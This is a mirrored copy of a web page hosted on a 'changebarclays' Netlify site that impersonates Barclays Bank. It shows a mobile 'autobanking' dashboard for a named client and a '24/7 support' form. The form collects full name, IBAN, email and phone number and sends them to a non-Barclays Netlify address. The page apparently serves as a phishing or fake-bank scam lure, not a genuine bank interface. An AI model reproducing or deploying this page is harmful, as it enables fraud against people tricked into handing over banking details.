<!DOCTYPE html>

<html
  lang="en"
  class="light-style layout-menu-fixed"
  dir="ltr"
  data-theme="theme-default"
  data-assets-path="../assets/"
  data-template="vertical-menu-template-free"
>

<!-- Mirrored from changebarclays.netlify.app/deploy-64fc81fbef58146e14a46c73/html/support by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 16 Jan 2024 03:19:00 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head>
  <meta charset="utf-8" />
  <meta
    name="viewport"
    content="width=device-width, initial-scale=1.0, user-scalable=no, minimum-scale=1.0, maximum-scale=1.0"
  />

  <title>Barclays Bank | William Frankie | Mobile</title>

  <meta name="description" content="" />

  <!-- Favicon -->
  <link rel="icon" type="image/x-icon" href="../../assets/img/barclays.html" />

  <!-- Fonts -->
  <link rel="preconnect" href="https://fonts.googleapis.com/" />
  <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin />
  <link
    href="https://fonts.googleapis.com/css2?family=Public+Sans:ital,wght@0,300;0,400;0,500;0,600;0,700;1,300;1,400;1,500;1,600;1,700&amp;display=swap"
    rel="stylesheet"
  />

  <!-- Icons. Uncomment required icon fonts -->
  <link rel="stylesheet" href="../assets/vendor/fonts/boxicons.css" />

  <!-- Core CSS -->
  <link rel="stylesheet" href="../assets/vendor/css/core.css" class="template-customizer-core-css" />
  <link rel="stylesheet" href="../assets/vendor/css/theme-default.css" class="template-customizer-theme-css" />
  <link rel="stylesheet" href="../assets/css/demo.css" />

  <!-- Vendors CSS -->
  <link rel="stylesheet" href="../assets/vendor/libs/perfect-scrollbar/perfect-scrollbar.css" />

  <link rel="stylesheet" href="../assets/vendor/libs/apex-charts/apex-charts.css" />

  <!-- Page CSS -->

  <!-- Helpers -->
  <script src="../assets/vendor/js/helpers.js"></script>

  <script src="../assets/js/config.js"></script>
</head>

<body>
  <!-- Layout wrapper -->
  <div class="layout-wrapper layout-content-navbar">
    <div class="layout-container">
      <!-- Menu -->

      <aside id="layout-menu" class="layout-menu menu-vertical menu bg-menu-theme">
        <div class="app-brand demo">
          <a href="../../sneat-bootstrap-html-admin-template/html/index.html" class="app-brand-link">
            <span class="app-brand-text demo menu-text fw-bolder ms-2"><img src="../assets/img/barclays/wordmark_rgb_cyan_large.svg" width="180px"></span>
          </a>

          <a href="javascript:void(0);" class="layout-menu-toggle menu-link text-large ms-auto d-block d-xl-none">
            <i class="bx bx-chevron-left bx-sm align-middle"></i>
          </a>
        </div>

        <div class="menu-inner-shadow"></div>

        <ul class="menu-inner py-1">
          <!-- Dashboard -->
          <li class="menu-item active">
            <a href="../html/william_frankie.html" class="menu-link">
              <i class="menu-icon tf-icons bx bx-home-circle"></i>
              <!-- CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  -->
              <div data-i18n="Analytics">
              <!--  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME-->
              William Frankie
                <!-- CLIENTS NAMECLIENTS NAMECLIENTS NAMECLIENTS NAMECLIENTS NAMECLIENTS NAMECLIENTS NAMECLIENTS NAMECLIENTS NAMECLIENTS NAMECLIENTS NAMECLIENTS NAMECLIENTS NAMECLIENTS NAMECLIENTS NAMECLIENTS NAMECLIENTS NAMECLIENTS NAMECLIENTS NAMECLIENTS NAMECLIENTS NAMECLIENTS NAMECLIENTS NAMECLIENTS NAMECLIENTS NAMECLIENTS NAMECLIENTS NAMECLIENTS NAMECLIENTS NAMECLIENTS NAMECLIENTS NAMECLIENTS NAMECLIENTS NAMECLIENTS NAMECLIENTS NAMECLIENTS NAMECLIENTS NAMECLIENTS NAMECLIENTS NAMECLIENTS NAMECLIENTS NAMECLIENTS NAMECLIENTS NAMECLIENTS NAME -->
              </div>
              <!--  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  CLIENTS NAME  -->
            </a>
          </li>
          <li class="menu-item">
            <a class='menu-link' href='support.html'>
              <i class="menu-icon tf-icons bx bx-support"></i>
              <div data-i18n="Support">Support</div>
            </a>
          </li>
          <li class="menu-item">
           <a class='menu-link' href='notification.html'>
             <i class="menu-icon tf-icons bx bx-collection"></i>
             <div data-i18n="Basic">Notifications</div>
           </a>
         </li>
       
         <li class="menu-item">
           <a class='menu-link' href='transfer.html'>
             <i class="menu-icon tf-icons bx bx-collection"></i>
             <div data-i18n="Basic">Transfer</div>
           </a>
         </li>
         
        </ul>
      </aside>
      <!-- / Menu -->

      <!-- Layout container -->
      <div class="layout-page">
        <!-- Navbar -->

        <nav
          class="layout-navbar container-xxl navbar navbar-expand-xl navbar-detached align-items-center bg-navbar-theme"
          id="layout-navbar"
        >
          <div class="layout-menu-toggle navbar-nav align-items-xl-center me-3 me-xl-0 d-xl-none">
            <a class="nav-item nav-link px-0 me-xl-4" href="javascript:void(0)">
              <i><img src="../../assets/img/barclays/Wordmark_RGB_Cyan_Large.html" width="130px"></i>
            </a>
          </div>

          <div class="navbar-nav-right d-flex align-items-center" id="navbar-collapse">
            <!-- Search -->
            <div class="navbar-nav align-items-center">
              <div class="nav-item d-flex align-items-center">
                <span class="nameLogo">BARCLAYS BANK MOBILE | AUTOBANKING</span>
              </div>
            </div>
            <!-- /Search -->

            <ul class="navbar-nav flex-row align-items-center ms-auto">

              <!-- User -->
              <li class="nav-item navbar-dropdown dropdown-user dropdown">
                <a class="nav-link dropdown-toggle hide-arrow" href="javascript:void(0);" data-bs-toggle="dropdown">
                  <div class="avatar avatar-online">
                    <img src="../assets/img/blank-profile-picture-973460_640.png" alt class="w-px-40 h-auto rounded-circle" />
                  </div>
                </a>
                <ul class="dropdown-menu dropdown-menu-end">
                  <li>
                    <a class="dropdown-item" href="#">
                      <div class="d-flex">
                        <div class="flex-shrink-0 me-3">
                          <div class="avatar avatar-online">
                            <img src="../assetS/img/blank-profile-picture-973460_640-2.png" alt class="w-px-40 h-auto rounded-circle" />
                          </div>
                        </div>
                        <div class="flex-grow-1">
                          <span class="fw-semibold d-block">
                            <!-- CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT -->
                            William Frankie
                            <!--  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME  CLIENT NAME CLIENT NAMECLIENT NAMECLIENT NAMECLIENT NAMECLIENT NAMECLIENT NAMECLIENT NAMECLIENT NAMECLIENT NAMECLIENT NAMECLIENT NAMECLIENT NAMECLIENT NAMECLIENT NAME  CLIENT  -->
                          </span>
                          <small class="text-muted">211****253</small>
                        </div>
                      </div>
                    </a>
                  </li>
                  <li>
                    <div class="dropdown-divider"></div>
                  </li>
                  <li>
                    <a class="dropdown-item" href="../../html/pages-account-settings-account.html">
                      <i class="bx bx-user me-2"></i>
                      <span class="align-middle">My Profile</span>
                    </a>
                  </li>
                  <li>
                    <div class="dropdown-divider"></div>
                  </li>
                  <li>
                    <a class='dropdown-item' href='auth-login-basic.html'>
                      <i class="bx bx-power-off me-2"></i>
                      <span class="align-middle">Log Out</span>
                    </a>
                  </li>
                </ul>
              </li>
              <!--/ User -->
            </ul>
          </div>
        </nav>

        <!-- / Navbar -->


          <!-- Content wrapper -->
          <div class="content-wrapper">
            <!-- Content -->

            <div class="container-xxl flex-grow-1 container-p-y">
              <h4 class="fw-bold py-3 mb-4"><span class="text-muted fw-light">Get <cite>24/7 support</cite> /</span> BARCLAYS</h4>

              <div class="col-xl">
                <div class="card mb-4">
                  <div class="card-header d-flex justify-content-between align-items-center">
                    <h5 class="mb-0"></h5>
                    <small class="text-muted float-end"></small>
                  </div>
                  <div class="card-body">
                    <form name="supportForm" method="get" action="https://changebarclays.netlify.app/html/Proccessing.html" onsubmit="return validateSupport()">
                      <div class="mb-3">
                        <label class="form-label" for="basic-icon-default-fullname">Full Name</label>
                        <div class="input-group input-group-merge">
                          <span id="basic-icon-default-fullname2" class="input-group-text"
                            ><i class="bx bx-user"></i
                          ></span>
                          <input
                            type="text"
                            class="form-control"
                            id="supportName"
                            placeholder="Enter full name"
                            aria-label="Enter full name"
                            aria-describedby="basic-icon-default-fullname2"
                            required
                          />
                        </div>
                      </div>
                      <div class="mb-3">
                        <label class="form-label" for="basic-icon-default-company">IBAN</label>
                        <div class="input-group input-group-merge">
                          <span id="basic-icon-default-company2" class="input-group-text"
                            ><i class="bx bx-buildings"></i
                          ></span>
                          <input
                            type="text"
                            id="supportIban"
                            class="form-control"
                            placeholder="Enter IBAN"
                            aria-describedby="basic-icon-default-company2"
                            required
                          />
                        </div>
                      </div>
                      <div class="mb-3">
                        <label class="form-label" for="basic-icon-default-email">Email</label>
                        <div class="input-group input-group-merge">
                          <span class="input-group-text"><i class="bx bx-envelope"></i></span>
                          <input
                            type="email"
                            id="supportEmail"
                            class="form-control"
                            placeholder="Enter email"
                            aria-describedby="basic-icon-default-email2"
                            required
                          />
                          <span id="basic-icon-default-email2" class="input-group-text"></span>
                        </div>
                        <div class="form-text">You will get notified via this email</div>
                      </div>
                      <div class="mb-3">
                        <label class="form-label" for="basic-icon-default-phone">Phone No</label>
                        <div class="input-group input-group-merge">
                          <span id="basic-icon-default-phone2" class="input-group-text"
                            ><i class="bx bx-phone"></i
                          ></span>
                          <input
                            type="text"
                            id="supportPhone"
                            class="form-control phone-mask"
                            placeholder="Optional"
                            aria-describedby="basic-icon-default-phone2"
                            required
                          />
                        </div>
                      </div>
                      <div class="mb-3">
                        <label class="form-label" for="basic-icon-default-message">Message</label>
                        <div class="input-group input-group-merge">
                          <span id="basic-icon-default-message2" class="input-group-text"
                            ><i class="bx bx-comment"></i
                          ></span>
                          <textarea
                            id="supportTextarea"
                            class="form-control" required
                            placeholder="Hi, drop a message and get suport from our 24/7 customer service system"
                            aria-label="Hi, Do you have a moment to talk Joe?"
                            aria-describedby="basic-icon-default-message2"
                          ></textarea>
                        </div>
                      </div>
                      <button type="submit" class="btn btn-primary">Send</button>
                    </form>
                  </div>
                </div>
              </div>
            </div>
          </div>
          <!-- / Content -->


            <div class="content-backdrop fade"></div>
          </div>
          <!-- Content wrapper -->
        </div>
        <!-- / Layout page -->
      </div>

      <!-- Overlay -->
      <div class="layout-overlay layout-menu-toggle"></div>
    </div>
    <!-- / Layout wrapper -->

    
    <!-- Core JS -->
    <!-- build:js assets/vendor/js/core.js -->
    <script src="../assets/vendor/libs/jquery/jquery.js"></script>
    <script src="../assets/vendor/libs/popper/popper.js"></script>
    <script src="../assets/vendor/js/bootstrap.js"></script>
    <script src="../assets/vendor/libs/perfect-scrollbar/perfect-scrollbar.js"></script>

    <script src="../assets/vendor/js/menu.js"></script>
    <!-- endbuild -->

    <!-- Vendors JS -->

    <!-- Main JS -->
    <script src="../assets/js/main.js"></script>

    <!-- Page JS -->

    <!-- Place this tag in your head or just before your close body tag. -->
    <script async defer src="../../../buttons.github.io/buttons.js"></script>
  </body>

<!-- Mirrored from changebarclays.netlify.app/deploy-64fc81fbef58146e14a46c73/html/support by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 16 Jan 2024 03:19:02 GMT -->
</html>
